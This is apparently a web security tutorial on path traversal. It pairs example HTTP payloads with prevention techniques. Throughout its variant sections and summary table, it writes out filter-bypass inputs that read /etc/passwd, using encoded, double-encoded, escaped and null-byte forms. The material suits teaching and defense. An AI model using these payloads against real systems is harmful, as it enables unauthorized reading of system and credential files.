# Path Traversal

## Overview

Directory Traversal is a web security vulnerability that allows an attacker to gain unauthorized access to files and directories stored outside the intended web root directory. This is often possible when an application uses user-supplied input to construct file paths.

***

### Common Attack Variants

#### 1. **Relative Path Traversal**

Using `../` sequences to traverse directories upwards from the web root.

```http
GET /loadImage?filename=../../../etc/passwd
```

#### 2. **Absolute Path Traversal**

Providing an absolute path directly to a sensitive file.

```http
GET /loadImage?filename=/etc/passwd
```

#### 3. **Traversal from a Known Start Path**

If the application validates the file path to begin with a specific base directory (e.g., `/var/www/images`), attackers may still traverse out of it:

```http
GET /loadImage?filename=/var/www/images/../../../etc/passwd
```

#### 4. **Traversal with Escaped Paths**

Using non-standard encodings or path tricks like:

```http
GET /loadImage?filename=....//....//....//etc/passwd
GET /loadImage?filename=....\/....\/....\/etc/passwd
```

#### 5. **Traversal Using URL Encoding**

To bypass filters that remove `../`, encode them:

* `%2e%2e%2f` (for `../`)
* `%252e%252e%252f` (double encoded)
* Other variants: `..%c0%af`, `..%ef%bc%8f`

```http
GET /loadImage?filename=..%252f..%252f..%252fetc/passwd
```

#### 6. **Null Byte Injection**

If file extensions are validated (e.g., `.png` required), a null byte `%00` may prematurely terminate the string:

```http
GET /loadImage?filename=../../../etc/passwd%00.png
```

***

### Prevention Techniques

1. **Disallow User-Controlled File Paths**
   * Do not use user input directly in file retrieval logic.
2. **Input Sanitization**
   * Strip path traversal sequences (`../`, `..\`, etc.) and URL-encoded forms.
3. **Restrict File Access**
   * Limit file access to predefined directories using strict whitelists.
4. **Use File Path Whitelisting**
   * Only allow access to known-safe files using a safelist.
5. **Run with Least Privilege**
   * Ensure the web server runs with permissions that prevent it from reading sensitive OS files.
6. **Canonicalization Before Validation**
   * Normalize file paths before validating them to avoid bypasses via encoding or obfuscation.

***

### Summary Examples

| Technique                               | Example URL                                     |
| --------------------------------------- | ----------------------------------------------- |
| Relative traversal                      | `?filename=../../../etc/passwd`                 |
| Absolute path                           | `?filename=/etc/passwd`                         |
| Null byte injection                     | `?filename=../../../etc/passwd%00.png`          |
| Encoded traversal                       | `?filename=%2E%2E%2Fetc%2Fpasswd`               |
| Known base path with relative traversal | `?filename=/var/www/images/../../../etc/passwd` |
| Escaped traversal                       | `?filename=....//....//etc/passwd`              |